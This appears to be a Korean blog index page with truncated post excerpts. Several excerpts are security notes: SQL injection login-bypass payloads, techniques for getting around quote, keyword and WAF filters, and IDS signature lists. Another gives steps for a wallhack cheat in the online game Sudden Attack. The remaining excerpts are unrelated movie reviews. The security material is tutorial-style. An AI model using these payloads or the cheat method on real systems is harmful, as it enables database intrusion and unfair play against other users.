보안세상

결과가 1보다 클 경우 점프 CF=0 and ZF=0 JAE 결과가 1보다 크거나 같을경우 점프 CF=0 JB 결과가 1보다 작을 경우 점프 CF=1 JBE 결과가 1보다 작거나 같을경우 점프 CF=1 or ZF=1 JC 캐리 플래그가 1일경우 점프 CF=1 JCXZ CX가 0일경우 점프 CX=0 JE 결과가 같을 경우 점프 ZF=1 JG 결과가 클경우 점프(signed) ZF=0 and SF=OF JGE 결과가 크거나 같을 경우 점프 (signed) SF=OF JL 결과가 작을 경우 점프(signed) SF != OF JLE 결과가 작거나 같을 경우 점프 (signed) ZF=1 or SF != OF JMP 무조건 점프 조건없음 JNA 결과가 작을 경우 점프 CF=1 or ZF=1 JNAE 결과가 작거..

SA.dat 파일에 클라이언트 날짜를 1994년으로 바꾸고 SA.dat파일에 sa_tex쪽 날짜를 1994로 바꾸꼬 서든어택을 실행하면 서든어택 패치를 한다며 sa_tex를 unpacking할떄 cancel을 누르고 패치 여부를 물어보면 예. 아니오 가 뜰때 아무것도 누르지 않은 상태에서 nexon폴더에 들어가 tempdir > game > sa_tex폴더 부분에 있는 dtx파일들 모두를 dedit으로 tga파일로 변경시킨 뒤 그림판으로 tga파일을 죄다 밝은 회색으로 바꾸면 월핵이 된다. 업데이트채널 포트가 취약하다. 아주 기초적인데 tmp파일을 생성하면 컨디셔너 어택에도 취약하고 이외에도 다양한 취약점들이 존재함.

quote 우회 따음표(')가 필터링이 되어있는데, 캐릭터를 비교 해야 한다면 아스키를 사용하면 된다.ascii는 문자열을 숫자로 바꿔주므로 ascii(a) = 97 과 같은 형태로 quote없이 비교 가능 Limit 우회인젝션시 Limit필터링이 걸려있다면 귀찮아 진다.( SELECT 구문에서WHERE, ORDER BY, LIMIT, OFFSET에 사용되기 때문ex)

euc kr과 utf 8변환 작업의 경우 multy byte를 이용해서 우회가 가능하다. (php의 addslashes(string str)함수는 매개변수로 넘겨준 문자열 안에 "나"라는 문자열이 있을 경우 앞에 \를 추가하여 주는 함수 이다.결론적으로 php와 mysql간의 연동시 필수적으로 해줘야 한다. 조금 깊게 들어가면 보통 db에 쿼리문을 보낼떄 ""또는 "로 한 문자열을 인식하게 되는데 이미 문자열에서 ""또는 "가 있다면 문자열이 2개이상으로 나뉘어져버린다. 그럼 보내야 되는 문자열은 1개인데 2개이상으로 인식해 쿼리문이 에러가 난다. 하지만 addslashes() 명령어를 쓰면 "나"문자열 앞에 전부 \를 붙혀줌으로써 \', \"의 명령어는 데이터베이스에서 와로 인식되 나뉠 문자열이라 생각..

인젝션 가능 파일 찾기 1) ' or''=' 2) ' or 1=1-- 3) ' or 'a'='a-- 4) 'or'='or' 5) " or 1=1-- 6) " or "a"="a 7) ') or ('a'='a 8) ") or ("a"="a 9) ' and [??] and ''='10) ' and [??] and '%25'='11) or 1=1-- 12) or 'a='a 13) ) or (1=1 14) and [??] ids에서 검사하는 항목NION SELECT OR 1=1 EXEC SP_ (or EXEC XP_) OR 'Unusual' = 'Unusual'OR 'Simple' = N'Simple'OR 'Simple' = 'Sim'+'ple' OR 'Simple' LIKE 'Sim%' OR 'Simple' I..

우회 패턴은 크게 3가지로 분류 가능하다.1) 네트워크의 특성을 이용한 우회 패턴2)어플리케이션의 잘못된 필터링 우회 패턴3)일반적인 SQL특성 우회 패턴 1) %를 이용하는 패턴일반적인 네트워크 장비들이 통신시 필요한 네트워크간의 패킷을 그대로 볼 수 있기 때문에 시도 가능한 패턴이다. URL 원본 : SELECT패턴1 : SEL%ECT패턴2 : %S%EL%E%C%T 등 URL인코딩을 이용한 방법들이다.HEX코드 앞에 %붙혀서 영어나 숫자 외에 문자들을 전송 할 수 있게 해준다.정말 간단하지만 Webknight는 우회할 수 있다. 2)문자열 치환가장많이 쓰는 방법중 하나인데 DBMS는 다양한 문자열과 인코딩 치환 기능을 제공한다.그러므로 DBMS를 잘 분석한다면 사용가능하다. MSSQL: where n..

1) 대소문자 변형 union select password from member where id='ireoa'-- UnION seLEct password ForM member WhErE id='ireoa'-- 2) 공백 우회 /**/ %0a %09 () 3)URL Encoding 3) = 우회 union select password from member where username = 'ireoa'-- union select password from member where username like 'ireoa'-- 4)URL Encoding '%2f%2a*/union%2f%2a*/select%2f%2a*/password%2f%2a*/form%2f%2a*/member%2f%2a*/where%2f%2a*/us..

영화를 보는 내내 정말 화려한 출연진에 감동받을 정도 였다. 정우성, 이범수, 안성기, 김인권, 이시영, 안길강, 이도경, 최진혁까지.. 액션 장면이나 영화를 진행해가는 빠른 속도는 눈을 홀릴정도로 즐거웠다. 하지만, 이런 화려한 출연자들과, 멋진 액션장면들까지 정말 좋았지만, 아쉽게도 스토리가 빈약했다. 그래서 텅빈 홈런볼 먹는 기분? 단팥 빠진 붕어빵 같은 영화였다.프로 바둑기사 태석(정우성)이 형과 함께 내기바둑판에 참여했다가, 살수(이범수)에 의해 형을 잃고, 형에 대한 살인 누명을 쓰고 교도소에 수감된다. 그곳에서 바둑에 빠져있던 어떤 조폭 보스의 도움을 받아, 그에게서 지식과 돈을 얻게 된다. 그리고, 몇년후, 형의 복수를 하기 위해, 내기바둑을 잘하는 선수들을 모아, 복수를 한다는 내용. 일..

연애는 달콤하기도 하고, 씁쓸하기도하다. 진하게 연애할 때는 이보다 더 좋은게 없고 서로가 없으면 죽을 것 같기도 하지만, 헤어지고 나면 '님에서 점 하나 붙여 남'이 되는, 타인보다도 못한 관계가 되는 경우도 다수다. 영화 는 그 중 전자에 속할까, 후자에 속할까?카피에서도 보이지만, 이 영화는 리얼연애, 현실연애에 가까운 쪽을 택해 '깊숙한 공감대'를 택했다. 기분좋게 아주 달달하게, 환상적인 연애담을 보여주기만 하는 '솜사탕같은 로코물'은 아니라는 것. 그래서 만족스러웠다면, 본인은 만족스러웠다. 달달한 로코물도 좋지만, 요런 대사 하나하나가 가슴 콕콕 찌르는 리얼연애담도 좋다. 무엇보다도 공감하면서 보게되기때문에 쉽게 몰입을 벗어날 수가 없다. 게다가, 재미까지 담았다면? 금상첨화다.장영(김민희)..

어쩔 수 없이 는 의 그늘에서 피하긴 어렵습니다. , , 로 이어지는 재난 영화의 계보 속에서 뭐가 새로운 특징을 잡는 게 어려울 수 밖에 없지요. 저 역시 그런 면에서 이 작품을 걱정했습니다. 개봉일 연기 또한 악영향을 줄지도 모른다고 생각했지요. 그런데 영활르 보고 난 지금 큰 걱정 안해도 되겠다 싶네요. 앞선 세 편의 재난 영화가 각각 흥행에 모두 성공한 것에는 이유가 있었지만 모두 약점도 가지고 있었던 것을 상기하면 적어도 제겐 앞선 세 작품보다 가 훨씬 흥미로워 만족스러웠습니다. 의 큰 미덕은 모두가 걱정하는 신파와는 아예 담을 쌓아 간격을 벌이고 흔히 보는 재난 영화의 구조는 따르고 있으나 세부적인 디테일에선 나쁜 점들을 잘 피해가고 있다는 것입니다. 분당 지역에 퍼진 바이러스라는 컨셉은 지역..